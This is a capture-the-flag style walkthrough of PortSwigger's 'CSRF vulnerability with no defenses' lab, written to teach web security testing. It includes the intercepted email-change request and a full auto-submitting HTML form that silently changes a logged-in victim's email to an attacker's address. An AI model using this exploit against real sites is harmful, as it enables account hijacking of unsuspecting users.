Labs Covered

This write-up focuses on the following labs from the PortSwigger Web Security Academy related to Cross-Site Request Forgery (CSRF):

1 CSRF vulnerability with no defenses

This lab demonstrates how attackers can exploit CSRF vulnerabilities in applications that lack any protection against such attacks.

LAB 1 - CSRF vulnerability with no defenses

Lab Description

Solution

Overview

This lab demonstrates a basic Cross-Site Request Forgery (CSRF) attack where the email change functionality is not protected by any anti-CSRF mechanisms.

Step-by-Step Walkthrough

1. Logging In

I logged into the application using the provided credentials:

Username: wiener
Password: peter

2. Navigating to Vulnerable Functionality

After login, I navigated to the My Account page.
I observed an Update email address form where users can change their registered email.

3. Analyzing the Request in Burp Suite

I intercepted the email change request in Burp Suite.
The POST request looked like this:

POST /my-account/change-email HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Cookie: session=your_session_cookie

email=admin@abc.com

Key Observations:
- No anti-CSRF tokens were present.
- No custom headers like X-CSRF-Token.
- Only a single parameter: email.

This confirmed that the application lacked CSRF protection.

4. Generating the CSRF Proof of Concept (PoC)

In Burp, I right-clicked the request and selected:
```
Engagement tools > Generate CSRF PoC
```

I enabled the Auto-submit script from the Options tab.

Final CSRF HTML PoC:

<html>
  <body>
    <form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="email-attacker@example.com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Replace YOUR-LAB-ID with your actual lab domain.

5. Delivering the Exploit

I hosted the PoC on the exploit server provided in the lab.
Clicked “Deliver exploit to victim”.
When the victim (logged-in user) visited the page, their email was silently changed to email-attacker@example.com.

portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.